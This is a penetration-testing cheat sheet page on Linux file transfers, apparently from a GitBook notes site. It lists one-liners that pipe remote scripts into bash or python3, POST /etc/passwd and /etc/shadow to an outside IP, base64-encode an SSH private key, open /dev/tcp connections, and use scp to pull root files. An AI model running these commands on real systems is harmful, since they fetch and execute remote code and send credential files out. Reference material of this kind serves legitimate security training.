RIO
  • Welcome
    • RIO
    • Useful Links
  • PENTESTING
    • Methodology
    • Protocols
      • FTP
      • SMB
      • NFS
      • SSH
      • RDP
      • SMTP
      • IMAP / POP3
      • RSYNC
      • SNMP
      • IPMI
      • R-Services
      • WinRM
      • WMI
      • LDAP
    • Databases
      • MySQL
      • MSSQL
      • Oracle TNS
      • PostgreSQL
    • File Transfers
      • Windows
      • Linux
      • Code
      • Misc
    • Password Attacks
      • John The Ripper
      • Hashcat
    • Docker
  • TOOLS
    • Nmap
    • Metasploit
    • BloodHound
    • Other
  • Linux
    • Theory
    • Commands and Utilities
      • Useful Commands
    • Bash Scripting
    • Post-Exploitation
      • Cred Hunting
      • Pivoting
    • Privilege Escalation
  • WINDOWS
    • Theory
      • Security
    • Commands and Utilities
    • PowerShell
    • Post-Exploitation
      • Tools
      • Enumeration
        • System
        • Network
        • Users
        • Groups
        • Processes / Services
        • Permissions
        • Defence
        • Programs
        • Files
      • Access
      • Pivoting
      • Cred Hunting
    • Privilege Escalation
      • Privileges
      • Built-In Groups
        • Backup Operators
        • Server Operators
        • Print Operators
        • DnsAdmins
        • Event Log Readers
      • Privilege Abuse
        • Potatoes
        • SeDebugPrivilege
        • SeTakeOwnershipPrivilege
      • MISC
        • UAC Bypass
        • User-Interaction Attacks
        • Weak Permissions
  • ACTIVE DIRECTORY
    • Theory
      • Terminology
    • Reconnaissance
      • Responder
      • Password Policies
      • DNS
      • Enumeration
        • Users
        • Groups
          • GPO's
        • Shares
        • Domain
        • Trusts
        • ACL
    • Movement
      • Credentials
        • Dumping
          • DCSync
        • Making a Target List
        • Spraying
        • Powershell Remoting
      • Kerberos
        • Kerbrute
        • Kerberoasting
          • Semi-Manual Way
          • Targeted Kerberoasting
        • ASREProasting
        • Forging
          • Golden Ticket
        • Overpass The Hash
        • Pass The Ticket
        • noPAC
      • MITM / Coerced Auths
        • LLMNR, NBT-NS Poisoning
        • PetitPotam
      • DACL Abuse
        • AddMember
        • ForceChangePassword
      • Trust Abuse
        • ExtraSIDs
      • ADCS
      • Printers
        • PrintNightmare
    • Tools
  • Networking
    • Theory
      • Types / Topologies
      • OSI & TCP/IP Models
      • TCP / UDP
      • MAC Addresses
      • IP / Subnetting
      • Proxies
      • ARP
    • Pivoting
      • Port-Forwarding
    • Commands and Utilities
    • Techniques
  • WEB
    • Web Recon
      • Fuzzing
    • DNS
  • CLOUD
    • Google GKE/GCP
      • Theory
Powered by GitBook
On this page
  • BASE64
  • Encode
  • Decode
  • CURL
  • Regular Download
  • Fileless Download
  • Multiple File Upload
  • WGET
  • Regular Download
  • Fileless Download
  • Upload
  • Alternative Methods
  • Bash(/dev/tcp)
  • SCP
  • Preparation
  • Download
  • Upload
  1. PENTESTING
  2. File Transfers

Linux

BASE64

Check MD5 Hash

md5sum id_rsa

Encode

In this example we are encoding SSH Key to Base64

cat id_rsa |base64 -w 0;echo

Decode

echo -n 'justimaginethisissomerandomhashbecauseyoudontcareandidontcare=` | base64 -d > id_rsa

CURL

Regular Download

curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

Fileless Download

curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash

Multiple File Upload

curl -X POST https://13.13.13.13/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure

WGET

Regular Download

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/LinEnum.sh

Fileless Download

wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3

Upload

Mechanism is similar to Windows web upload using uploadserver module:

sudo python3 -m pip install --user uploadserver

Secure HTTPS Web Server

  1. Start Web Server

sudo python3 -m pip install --user uploadserver

  1. Create a Self-Signed Certificate

openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'

  1. Start Web Server

mkdir https && cd https
sudo python3 -m uploadserver 443 --server-certificate /root/server.pem

Alternative Methods

Creating a Web Server with Python3

python3 -m http.server

Creating a Web Server with Python2.7

python2.7 -m SimpleHTTPServer

Creating a Web Server with PHP

php -S 0.0.0.0:8000

Creating a Web Server with Ruby

ruby -run -ehttpd . -p8000

Bash(/dev/tcp)

Connect to the Target Webserver

exec 3<>/dev/tcp/13.13.13.13/80

HTTP GET Request

echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3

Print the Response

cat <&3

SCP

SSH is a protocol that allows secure access to remote computers. And we could use SCP utility which uses SSH protocol for transferring files

Preparation

Enabling the SSH Server

sudo systemctl enable ssh

Starting the SSH Server

sudo systemctl start ssh

Checking for SSH Listening Port

netstat -lnpt

Download

scp sreed@13.13.13.13.:/root/root.txt .

Upload

scp /etc/passwd sreed@13.13.13.13:/home/plaintext/
PreviousWindowsNextCode